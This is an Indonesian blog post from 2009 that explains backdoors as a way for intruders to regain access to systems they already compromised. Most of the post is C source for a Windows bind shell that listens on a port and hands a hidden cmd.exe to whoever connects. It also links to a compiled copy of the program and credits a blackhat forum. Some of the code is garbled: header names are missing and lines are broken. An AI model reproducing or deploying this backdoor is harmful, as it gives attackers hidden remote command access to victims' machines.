Minggu, 12 Juli 2009

Simple Backdoor

Backdoor merupakan jalan belakang untuk menghindari password untuk login. Jalan belakang ini dimungkinkan karena aplikasi atau rootkit yang jalan dikomputer tersebut. Sehingga Backdoor merupakan suatu istilah yang seringkali digunakan untuk masuk ke dalam sistem tanpa sepengetahuan administrator, namun hal tersebut bisa dilakukan jika penyusup pernah masuk kedalam sistem tersebut dengan hak akses root. Pemberian backdoor dilakukan untuk mempermudah mereka memasuki sistem tersebut jika jalan yang telah dibuat dengan eksploit telah ditutup oleh administrator. Sehingga tujuan dari backdoor bukan untuk mendapatkan previlege root, tetapi untuk mendapatkan kembali previlege yang pernah diperoleh.

nih contoh script back door :

#include    // ZeroMemory()
#include // API do Winsock

#define PORTA 12345

int main()
{
WSADATA wsainfo
;
SOCKET sock
;
struct sockaddr_in addr;

STARTUPINFO ini_info
;
PROCESS_INFORMATION proc_info
;

if(WSAStartup(0x202,&wsainfo) == SOCKET_ERROR)
return 1;

if((sock = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0)) == SOCKET_ERROR)
return 1;

addr
.sin_family = AF_INET;
addr
.sin_port = htons(PORTA);
addr
.sin_addr.s_addr = INADDR_ANY;

if(bind(sock,(struct sockaddr*)&addr,sizeof(addr)) == SOCKET_ERROR)
return 1;

listen
(sock,1);

if((sock = accept(sock,0,0)) == SOCKET_ERROR)
return 1;

ZeroMemory(&ini_info, sizeof(STARTUPINFO));
ZeroMemory(&proc_info, sizeof(PROCESS_INFORMATION));

ini_info
.cb = sizeof(STARTUPINFO);
ini_info.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
ini_info
.wShowWindow = SW_HIDE;
ini_info
.hStdInput = ini_info.hStdOutput = ini_info.hStdError = (HANDLE)sock;

CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &ini_info, &proc_info);

return 0;
}


File yang sudah tercompile
http://wWw.hunterhac...br/backdoor.rar

sumber:
script di coding oleh Dark_side (http://www.blackhat-forums.com)
mas yudi (yudi-poenya-gawe.blogspot.com)

0 komentar:

Posting Komentar